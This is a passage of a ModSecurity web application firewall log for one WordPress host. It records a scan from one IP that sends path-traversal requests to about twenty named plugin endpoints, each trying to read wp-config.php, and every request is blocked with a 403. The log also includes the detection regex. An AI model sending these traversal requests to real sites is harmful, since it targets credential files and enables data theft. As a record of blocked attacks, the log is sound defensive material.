[hostname "investigacionperu.com"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZWrqUu_3DJVyFB5gsokYMQAAAI8"] [Sat Dec 02 03:26:58.903096 2023] [:error] [pid 23871:tid 140215867905792] [client 37.139.53.67:40488] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZWrqUjTw0SF51YqyrqOd5AAAAAo"] [Sat Dec 02 03:26:59.012533 2023] [:error] [pid 23871:tid 140215825942272] [client 37.139.53.67:40490] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZWrqUzTw0SF51YqyrqOd5QAAAA8"] [Sat Dec 02 03:26:59.122595 2023] [:error] [pid 23871:tid 140215800764160] [client 37.139.53.67:40492] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php"] [unique_id "ZWrqUzTw0SF51YqyrqOd5gAAABI"] [Sat Dec 02 03:26:59.233291 2023] [:error] [pid 23871:tid 140215767193344] [client 37.139.53.67:40494] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZWrqUzTw0SF51YqyrqOd5wAAABY"] [Sat Dec 02 03:26:59.343620 2023] [:error] [pid 23871:tid 140215859513088] [client 37.139.53.67:40496] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-mp3-audio-player/direct_download.php"] [unique_id "ZWrqUzTw0SF51YqyrqOd6AAAAAs"] [Sat Dec 02 03:26:59.453906 2023] [:error] [pid 23871:tid 140215998355200] [client 37.139.53.67:40498] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZWrqUzTw0SF51YqyrqOd6QAAAAM"] [Sat Dec 02 03:26:59.563899 2023] [:error] [pid 24358:tid 140216023533312] [client 37.139.53.67:40500] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/history-collection/download.php?var=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/history-collection/download.php"] [unique_id "ZWrqUw3foCjRd8l2OkZ7NAAAAMA"] [Sat Dec 02 03:26:59.673614 2023] [:error] [pid 24358:tid 140216006747904] [client 37.139.53.67:40502] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/old-post-spinner/logview.php?ops_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/old-post-spinner/logview.php"] [unique_id "ZWrqUw3foCjRd8l2OkZ7NQAAAMI"] [Sat Dec 02 03:26:59.783213 2023] [:error] [pid 24358:tid 140215918262016] [client 37.139.53.67:40504] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/pica-photo-gallery/picadownload.php"] [unique_id "ZWrqUw3foCjRd8l2OkZ7NgAAAMQ"] [Sat Dec 02 03:26:59.893159 2023] [:error] [pid 24358:tid 140215859513088] [client 37.139.53.67:40506] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/pictpress/resize.php?size=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/pictpress/resize.php"] [unique_id "ZWrqUw3foCjRd8l2OkZ7NwAAAMs"] [Sat Dec 02 03:27:00.003479 2023] [:error] [pid 24358:tid 140215893083904] [client 37.139.53.67:40508] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/recent-backups/download-file.php"] [unique_id "ZWrqVA3foCjRd8l2OkZ7OAAAAMc"] [Sat Dec 02 03:27:00.113204 2023] [:error] [pid 24358:tid 140215817549568] [client 37.139.53.67:40512] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/robotcpa/f.php?l=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/robotcpa/f.php"] [unique_id "ZWrqVA3foCjRd8l2OkZ7OgAAANA"] [Sat Dec 02 03:27:00.222949 2023] [:error] [pid 24358:tid 140215750407936] [client 37.139.53.67:40514] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php"] [unique_id "ZWrqVA3foCjRd8l2OkZ7OwAAANg"] [Sat Dec 02 03:27:00.352736 2023] [:error] [pid 23873:tid 140215783978752] [client 37.139.53.67:40516] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZWrqVCUYSj4DVa63o8QDsQAAAFQ"] [Sat Dec 02 03:27:00.462629 2023] [:error] [pid 23871:tid 140215918262016] [client 37.139.53.67:40518] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/site-import/admin/page.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/site-import/admin/page.php"] [unique_id "ZWrqVDTw0SF51YqyrqOd6gAAAAQ"] [Sat Dec 02 03:27:00.573003 2023] [:error] [pid 24358:tid 140215767193344] [client 37.139.53.67:40520] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZWrqVA3foCjRd8l2OkZ7PAAAANY"] [Sat Dec 02 03:27:00.682869 2023] [:error] [pid 23871:tid 140215834334976] [client 37.139.53.67:40522] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZWrqVDTw0SF51YqyrqOd6wAAAA4"] [Sat Dec 02 03:27:00.792722 2023] [:error] [pid 23873:tid 140215800764160] [client 37.139.53.67:40524] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZWrqVCUYSj4DVa63o8QDsgAAAFI"] [Sat Dec 02 03:27:00.902997 2023] [:error] [pid 24358:tid 140215809156864] [client 37.139.53.67:40526] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "ZWrqVA3foCjRd8l2OkZ7PQAAANE"] [Sat Dec 02 03:27:01.012801 2023] [:error] [pid 23871:tid 140215758800640] [client 37.139.53.67:40528] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-miniaudioplayer/map_download.php"] [unique_id "ZWrqVTTw0SF51YqyrqOd7AAAABc"] [Sat Dec 02 03:27:01.123238 2023] [:error] [pid 24358:tid 140215775586048] [client 37.139.53.67:40530] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZWrqVQ3foCjRd8l2OkZ7PgAAANU"] [Sat Dec 02 03:27:01.234334 2023] [:error] [pid 24358:tid 140215867905792] [client 37.139.53.67:40532] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri 